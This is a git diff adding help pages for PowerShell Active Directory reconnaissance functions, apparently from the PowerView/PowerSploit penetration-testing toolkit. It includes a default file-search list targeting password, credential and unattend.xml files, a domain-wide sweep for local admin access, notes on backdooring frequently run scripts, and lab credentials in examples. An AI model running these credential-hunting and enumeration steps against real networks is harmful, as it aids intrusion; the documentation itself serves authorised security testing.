+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.FoundFile

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md
new file mode 100755
index 0000000..2fe6abf
--- /dev/null
+++ b/docs/Recon/Find-InterestingFile.md
@@ -0,0 +1,248 @@
+# Find-InterestingFile

+

+## SYNOPSIS

+Searches for files on the given path that match a series of specified criteria.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection

+

+## SYNTAX

+

+### FileSpecification (Default)

+```

+Find-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]

+ [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]

+ [-Credential <PSCredential>]

+```

+

+### OfficeDocs

+```

+Find-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]

+```

+

+### FreshEXEs

+```

+Find-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function recursively searches a given UNC path for files with

+specific keywords in the name (default of pass, sensitive, secret, admin,

+login and unattend*.xml).

+By default, hidden files/folders are included

+in search results.

+If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection

+is used to temporarily map the remote share.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-InterestingFile -Path "C:\Backup\"

+```

+

+Returns any files on the local path C:\Backup\ that have the default

+search term set in the title.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)

+```

+

+Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default

+search term set in the title and were accessed within the last week.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\"

+

+## PARAMETERS

+

+### -Path

+UNC/local path to recursively search.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: .\

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Include

+Only return files/folders that match the specified array of strings,

+i.e.

+@(*.doc*, *.xls*, *.ppt*)

+

+```yaml

+Type: String[]

+Parameter Sets: FileSpecification

+Aliases: SearchTerms, Terms

+

+Required: False

+Position: Named

+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LastAccessTime

+Only return files with a LastAccessTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LastWriteTime

+Only return files with a LastWriteTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CreationTime

+Only return files with a CreationTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OfficeDocs

+Switch.

+Search for office documents (*.doc*, *.xls*, *.ppt*)

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: OfficeDocs

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FreshEXEs

+Switch.

+Find .EXEs accessed within the last 7 days.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: FreshEXEs

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludeFolders

+Switch.

+Exclude folders from the search results.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludeHidden

+Switch.

+Exclude hidden files and folders from the search results.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CheckWriteAccess

+Switch.

+Only returns files the current user has write access to.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+to connect to remote systems for file enumeration.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.FoundFile

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md
new file mode 100755
index 0000000..f3e3b6f
--- /dev/null
+++ b/docs/Recon/Find-LocalAdminAccess.md
@@ -0,0 +1,337 @@
+# Find-LocalAdminAccess

+

+## SYNOPSIS

+Finds machines on the local domain where the current user has local administrator access.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction

+

+## SYNTAX

+

+```

+Find-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]

+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]

+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and for each computer it checks if the current user

+has local administrator access using Test-AdminAccess.

+If -Credential is passed,

+then Invoke-UserImpersonation is used to impersonate the specified user

+before enumeration, reverting after with Invoke-RevertToSelf.

+

+Idea adapted from the local_admin_search_enum post module in Metasploit written by:

+    'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'

+    'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'

+    'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-LocalAdminAccess

+```

+

+Finds machines in the current domain the current user has admin access to.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-LocalAdminAccess -Domain dev.testlab.local

+```

+

+Finds machines in the dev.testlab.local domain the current user has admin access to.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred

+

+Finds machines in the testlab.local domain that the user with the specified -Credential

+has admin access to.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CheckShareAccess

+Switch.

+Only display found shares that the local user has access to.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### String

+

+Computer dnshostnames the current user has administrative access to.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-ComputerDetail.md b/docs/Recon/Get-ComputerDetail.md
new file mode 100755
index 0000000..15a3feb
--- /dev/null
+++ b/docs/Recon/Get-ComputerDetail.md
@@ -0,0 +1,68 @@
+# Get-ComputerDetail

+

+## SYNOPSIS

+This script is used to get useful information from a computer.

+

+Function: Get-ComputerDetail  

+Author: Joe Bialek, Twitter: @JosephBialek  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Get-ComputerDetail [-ToString]

+```

+

+## DESCRIPTION

+This script is used to get useful information from a computer.

+Currently, the script gets the following information:

+-Explicit Credential Logons (Event ID 4648)

+-Logon events (Event ID 4624)

+-AppLocker logs to find what processes are created

+-PowerShell logs to find PowerShell scripts which have been executed

+-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ComputerDetail

+```

+

+Gets information about the computer and outputs it as PowerShell objects.

+

+Get-ComputerDetail -ToString

+Gets information about the computer and outputs it as raw text.

+

+## PARAMETERS

+

+### -ToString

+Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.

+You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.

+

+## RELATED LINKS

+

+[Blog: http://clymb3r.wordpress.com/

+Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/

+Github repo: https://github.com/clymb3r/PowerShell)

+

diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md
new file mode 100755
index 0000000..aa8098c
--- /dev/null
+++ b/docs/Recon/Get-Domain.md
@@ -0,0 +1,81 @@
+# Get-Domain

+

+## SYNOPSIS

+Returns the domain object for the current (or specified) domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-Domain [[-Domain] <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current

+domain or the domain specified with -Domain X.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-Domain -Domain testlab.local

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-Domain -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain name to query for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.DirectoryServices.ActiveDirectory.Domain

+

+A complex .NET domain object.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)

+

diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md
new file mode 100755
index 0000000..562f769
--- /dev/null
+++ b/docs/Recon/Get-DomainComputer.md
@@ -0,0 +1,426 @@
+# Get-DomainComputer

+

+## SYNOPSIS

+Return all computers or specific computer objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]

+ [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]

+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]

+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties samaccountname,usnchanged,...".

+By default, all computer objects for

+the current domain are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainComputer

+```

+

+Returns the current computers in current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainComputer -SPN mssql* -Domain testlab.local

+```

+

+Returns all MS SQL servers in the testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained

+```

+

+Search the specified OU for computeres that allow unconstrained delegation.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainComputer -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+WINDOWS10$), DistinguishedName (e.g.

+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.

+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),

+or a dns host name (e.g.

+windows10.testlab.local).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: SamAccountName, Name, DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Unconstrained

+Switch.

+Return computer objects that have unconstrained delegation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -TrustedToAuth

+Switch.

+Return computer objects that are trusted to authenticate for other principals.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Printers

+Switch.

+Return only printers.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SPN

+Return computers with a specific service principal name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePrincipalName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OperatingSystem

+Return computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServicePack

+Return computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SiteName

+Return computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Ping

+Switch.

+Ping each host to ensure it's up before enumerating.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.Computer

+

+Custom PSObject with translated computer property fields.

+

+PowerView.Computer.Raw

+

+The raw DirectoryServices.SearchResult object, if -Raw is enabled.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md
new file mode 100755
index 0000000..3d15f5c
--- /dev/null
+++ b/docs/Recon/Get-DomainController.md
@@ -0,0 +1,132 @@
+# Get-DomainController

+

+## SYNOPSIS

+Return the domain controllers for the current (or specified) domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Get-Domain

+

+## SYNTAX

+

+```

+Get-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Enumerates the domain controllers for the current or specified domain.

+By default built in .NET methods are used.

+The -LDAP switch uses Get-DomainComputer

+to search for domain controllers.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainController -Domain 'test.local'

+```

+

+Determine the domain controllers for 'test.local'.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainController -Domain 'test.local' -LDAP

+```

+

+Determine the domain controllers for 'test.local' using LDAP queries.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+'test.local' | Get-DomainController

+```

+

+Determine the domain controllers for 'test.local'.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainController -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+The domain to query for domain controllers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAP

+Switch.

+Use LDAP queries to determine the domain controllers instead of built in .NET methods.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

